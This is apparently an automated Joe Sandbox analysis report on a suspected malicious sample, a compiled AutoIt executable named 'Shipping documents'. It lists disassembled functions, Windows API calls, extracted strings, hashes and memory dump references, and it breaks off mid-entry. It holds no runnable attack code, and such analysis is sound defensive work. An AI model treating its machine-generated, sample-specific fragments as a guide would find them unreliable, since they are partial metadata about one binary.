                                                                                                          • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                          • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                          • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                          Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                          • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                          • CloseClipboard.USER32 ref: 0046DD41
                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                          • CloseClipboard.USER32 ref: 0046DD99
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 15083398-0
                                                                                                          • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                          • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                          • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                          • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                          Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                          • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                          • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                          • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                          • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                          • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                          • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                          • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                          • String ID: @$AutoIt v3 GUI
                                                                                                          • API String ID: 867697134-3359773793
                                                                                                          • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                          • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                          • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                          • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                          Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                          • API String ID: 1503153545-1459072770
                                                                                                          • Opcode ID: 317b836bd45d303022c8cfe41fd482541af156a870e12d87d8544c7d52709fdd
                                                                                                          • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                                          • Opcode Fuzzy Hash: 317b836bd45d303022c8cfe41fd482541af156a870e12d87d8544c7d52709fdd
                                                                                                          • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                                          Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicoll$__wcsnicmp
                                                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                                          • API String ID: 790654849-32604322
                                                                                                          • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                          • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                                          • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                          • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                                          Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                                                                          • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                          • Opcode Fuzzy Hash: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                                                                          • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                          Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                                                          • _fseek.LIBCMT ref: 00452B3B
                                                                                                          • __wsplitpath.LIBCMT ref: 00452B9B
                                                                                                          • _wcscpy.LIBCMT ref: 00452BB0
                                                                                                          • _wcscat.LIBCMT ref: 00452BC5
                                                                                                          • __wsplitpath.LIBCMT ref: 00452BEF
                                                                                                          • _wcscat.LIBCMT ref: 00452C07
                                                                                                          • _wcscat.LIBCMT ref: 00452C1C
                                                                                                          • __fread_nolock.LIBCMT ref: 00452C53
                                                                                                          • __fread_nolock.LIBCMT ref: 00452C64
                                                                                                          • __fread_nolock.LIBCMT ref: 00452C83
                                                                                                          • __fread_nolock.LIBCMT ref: 00452C94
                                                                                                          • __fread_nolock.LIBCMT ref: 00452CB5
                                                                                                          • __fread_nolock.LIBCMT ref: 00452CC6
                                                                                                          • __fread_nolock.LIBCMT ref: 00452CD7
                                                                                                          • __fread_nolock.LIBCMT ref: 00452CE8
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                          • __fread_nolock.LIBCMT ref: 00452D78
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                          • String ID:
                                                                                                          • API String ID: 2054058615-0
                                                                                                          • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                          • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                                          • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                          • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                                                          Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                          • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                          • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                          • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                          • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                          • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                          • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                          • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                          • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                          • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                          • String ID:
                                                                                                          • API String ID: 1744303182-0
                                                                                                          • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                          • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                          • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                          • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                          Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                          • __mtterm.LIBCMT ref: 00417C34
                                                                                                            • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                            • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                          • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                          • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                          • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                          • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                          • API String ID: 4163708885-3819984048
                                                                                                          • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                          • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                          • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                          • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                                          Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                          • API String ID: 0-1896584978
                                                                                                          • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                          • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                                          • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                          • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                                                          Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicoll$IconLoad
                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                          • API String ID: 2485277191-404129466
                                                                                                          • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                          • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                                          • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                          • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                          Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                          • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                          • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                          • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                          • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                          • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                          • String ID:
                                                                                                          • API String ID: 3869813825-0
                                                                                                          • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                          • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
